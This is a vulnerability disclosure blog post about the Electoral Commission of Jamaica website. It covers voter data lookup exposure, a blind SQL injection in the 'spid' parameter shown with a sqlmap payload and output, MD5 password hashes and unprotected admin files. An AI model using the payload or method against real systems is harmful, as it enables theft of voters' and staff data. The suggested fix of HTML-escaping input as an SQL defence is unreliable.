Disclaimers: This article was wrote as a result of my security research findings and is meant to informs the public of how their information is handled and cyber security surrounding Electoral Commission of Jamaica (ECJ) system. Hacking is a computer crime! The author do not encourage illegal hacking nor is responsible for any trouble you might run into as a result of illegal hacks. The author have an obligation to responsible disclosure vulnerabilities to the public hence the findings and demonstrations. The author hope that as a result of the published findings to the public, ECJ will be forced to fix the issues as findings reported to Jamaica Cyber Incident Response team in August 2016 was not addressed.

In the last few years, we have seen an increase in the number of cyber attacks. For those who are not familiar with the term, cyber attack can be define as “an attempt by hackers to damage or destroy a computer network or system.”Many countries have take steps to protect their networks and infrastructures through the use of cybersecurity. In fact, cyber attack is the new way of war. Wars are no longer being fought with just Guns. They are now being conducts through the use of computers and is know as cyber war.

Millions of devices are connected to the Internet with data such as bank account, bills payment, medical information, intellectual properties, stock market data and among other sensitive information. Given the nature of those data, encryption is implemented. This make the data looks like a scramble texts so that hackers cannot access your personal information. Hackers are constantly looking for “weakness” in system, design flaws and among other. With that being said, EVERYONE is a target, no country nor individual is exempt.

Last semester while taking a course entitled “Engineering Secure Software” at Rochester Institute of Technology, I decided to apply my learning in real word environment through the form of research. “What is better than examine the cybersecurity strength of my own country, Jamaica?” ,I thought to myself. With that in mind, I decided to focus on a “target” that have a big impacts if they were to be “attacked”. I decided to pick Electoral Commission of Jamaica (ECJ) website. ECJ contain data such as the election results, voters information, employee information and among other sensitive materials. Prior to processing with my research, I established the following guidelines:

The system will not be defaced or break in anyway nor prevent from providing services to the users.

Respect of any sensitive data that may be discover during the research and will not be make available to public

Do not modify the database in anyway.

System remain unmodified

Malicious scripts will not be upload to the server.

Disclosure on the vulnerabilities will be available to the public after the authorized parties have been informed and give a specific time frame to fix the vulnerabilities.

During my research, vulnerabilities were indeed found on ECJ website both that of design and programming flaws. First I will discuss the design flaw. On ECJ website, voters can check whether they are on the voting list by visit the link http://www.ecj.com.jm/content-57-146.htm . The page load the following image

One may be tempted to think this is an innocent thing. On the contrary, this is a huge design flaw because ANYONE can look up anyone. I dare to say 95% of the information we need are openly available on the Internet. A quick Facebook search of the person we want to check for will tell us their birthday and full name. Upon entering the the required fields, the user then have access to the person’s home address, occupation and, full name including the middle name and among other information that may otherwise want to keep private. For the sake of of the argument, let us say we want to know if Prime Minister Andrew Holness is on the voter’s list…. Exactly, we all know his last, first and birthday. Chance are that it is available online! A quick Google search on his name, we can then access information about him on the voter’s list. While some may argued that this doesn't do much to an individual, it is not so. It can done a lot of damage. As we all know, Jamaica and America are on a different level when it come to politics and voting. Although a democracy country, most Jamaican fears for their lives during the elections. Some neighborhood are “don” controlled, yes! Even the “don” can performs a simple look up and know every person in the community that are eligible to vote and force them to vote for a certain party.

In order to see whether ECJ is vulnerabilities to different type of attacks, two tools sqlmap and uniscan

sudo uniscan -u http:

This allows us check all links on the page, directory listing as well as sql injection possibilities and other attacks. it was discovered that blind sql injections is possible on the domain through manipulating the url to:

http:

Seeing this type of result, one can safely concluded that the website is using an outdated PHP practice of using the mysql_ extension instead of PDO prepare statements which prevent against sql injections. In additional, the inputs obviously not filtered or validate. A safe actions would have been:

if ( isset ($_GET[ 'spid' ])) { $input = htmlentities(trim($_GET[ 'spid' ])); or $input = htmlspecialchars(trim($_GET[ 'spid' ])); }

Depending on the nature of the system or data intended to return, the $_GET['spid'] can be tweaked to perform more validation such as strip certain tags with strip_slashes, or even strip out possible url and so on. Converting the inputs to html entities is one of the many ways to prevent malicious code from being wrote. A database should NEVER execute an input without first perform inputs validation.we will now execute sqlmap to ensures that the vulnerabilities reported by the uniscan are not some kind of false positives.

- . . . . -- --

This will analysis the database using the potential SQL injection vulnerability link we found. --banner allows it to perform all kind of testes while --batch make it able to run without without prompts questions.

At first we saw the following message "WARNING] heuristic (basic) test shows that GET parameter 'spid' might not be injectable". However,after it finish perform all tests we are then presented with "GET parameter 'spid' is vulnerable." according to sqlmap the sql code that brings the system to its knee is:

Parameter: spid (GET) Type: boolean -based blind Title: MySQL >= 5.0 boolean -based blind - Parameter replace Payload: spid=(SELECT ( CASE WHEN ( 2354 = 2354 ) THEN 2354 ELSE 2354* ﻿ ﻿ (SELECT 2354 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

From there we could then issue command to return the available databases using the commands:

- . . . . -- --

After the commands are execute, we are presented with:

[08:27:45] [INFO] retrieved: 625551_ecj , [08:28:01] [INFO] retrieved: information_schema.

We can see that the most interesting database would be 625551_ecj. Which is the database that possible have the information of ECJ's voting results, voters, employees and among others. The attacker then can continue input different sqlmap commands to get the name of tables,columns, and even password. A further analysis revealed that the password are stored in hash…..md5 hash another hash algorithm that is outdated, weak and has been broken. This algorithm is not recommended to use in securing anything sensitive at all!

Some files in supposed 'admin' areas are found to be unprotected. An example of admin area is http://www.ecj.com.jm/cms/, running a simple dirbuster will yields files within http://www.ecj.com.jm/cms/, with patients attackers can find some that are not protected. Directory listing should be off as well steps should be taken to ensure files in the admin area are protected.

I have reported my finding to Jamaica Cyber Incident Response Team August and up to date, there has not been any fixes. An attacker can do several damages if the issues remain unfix, such damages includes:

steal of voters information includes home address, occupations and among other.

manipulate voter list

steal ECJ staff credential information

manipulate voting results

publish sensitive materials in public forums to make statements

hack into the database and delete everything or even deface the website to make a politic statements.

And many other damages!

In conclusion, Jamaica needs to take cybersecurity serious. This should be more than just “talking” about implementing security measures and never put them in places. Findings of security breaches, flaws, or vulnerabilities should not be ignored. Government need to taking cyber security by:

Start setting examples by starting securing their own websites and affiliates.

Encourage ethical hacking/pentesting of the national cybersecurity defense for the sake of fixing those vulnerabilities.

Promote researches into cybersecurity and vulnerabilities findings such as bug bounty programs

Implement a more strict regulation on how sensitive materials are stored.

Held companies responsibility for failure to protect user’s information and ensure that they adherence to OWASP standards.

Make it an mandatory for company to have "windows" fixes for bug(s) or security breach(es) found on their website then informs the public of the vulnerability and fixes that are now in places. Companies have a responsibility to informs customers when vulnerabilities are found in their system or service platform period.

Increase cybersecurity courses being taught in local colleges/universities.

Hire more qualified individuals for Jamaica Cyber Incident Response Team and among other cybersecurity practices.



